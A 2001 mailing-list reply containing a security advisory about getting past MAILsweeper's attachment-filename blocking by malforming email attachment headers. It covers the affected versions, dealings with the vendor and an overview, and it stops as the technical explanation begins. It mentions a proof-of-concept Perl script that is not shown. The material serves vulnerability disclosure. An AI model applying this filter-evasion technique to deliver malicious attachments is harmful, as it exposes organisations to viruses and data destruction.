RE: E-Mail Content Filtering Systems.

From: Paul Rogers (paul.rogers@mis-cds.com)
Date: Fri Jul 20 2001 - 03:44:13 PDT

    Hi Aidan,

    We found a similar issue in MailSweeper at the beginning of the year
    and contacted Baltimore regarding this issue. They decided that is
    wasn't a serious issue and begrudgingly released an advisory about it
    on there website and classified it as a low risk issue. The advisory
    on Baltimore's site can be found at:

    http://www.contenttechnologies.com/support/technotes/notes/1102.asp

    Our own advisory is below (I've modified the extension to v*b*s to
    prevent it being blocked at the e-mail gateways). Attached is quick
    'n' dirty PERL script I knocked together at the time (note the script
    also has the v*b*s modification made to it).

    Systems affected:
    - -----------------

    MAILsweeper 4.2.* (not tested other e-mail content filtering
    systems).

    Affected:
    - ---------

    Companies or organisations relying upon MAILsweeper or other email
    content filtering systems, to protect themselves against viruses or
    malicious attachments by blocking e-mails via attachment filename.

    Vendor status:
    - --------------

    Content Technologies (MAILsweeper) - liased with the vendor to
    provide a workaround and solution to the issue identified (15th
    February - 9th March 2001).

    Overview:
    - ---------

    A large number of organisations including many IT Security companies
    utilise MAILsweeper by Content Technologies (now Baltimore) to
    protect and prevent mailicious viruses and / or attachments from
    entering their networks. However a situation has been brought to our
    attention where a malicious user can bypass content filtering systems
    in place.

    When an administrator sets up fileblocking using a filter (File
    Blocker), this restriction can be bypassed by malforming an e-mail
    attachment header to trick the system into letting the e-mail through
    to the user. This can lead to viruses and files that the
    administrator would like to restrict, entering the network and
    possibly leading to denial of service and data destruction scenarios.

    No previously known issues were found to be present on the vendor's
    website and security archives on the internet.

    Issue:
    - ------

    When a user sends an e-mail to another user with an attachment, the
    e-mail will include the mail headers, the body of the e-mail, the
    attachment headers and the attachment (typically MIME encoded):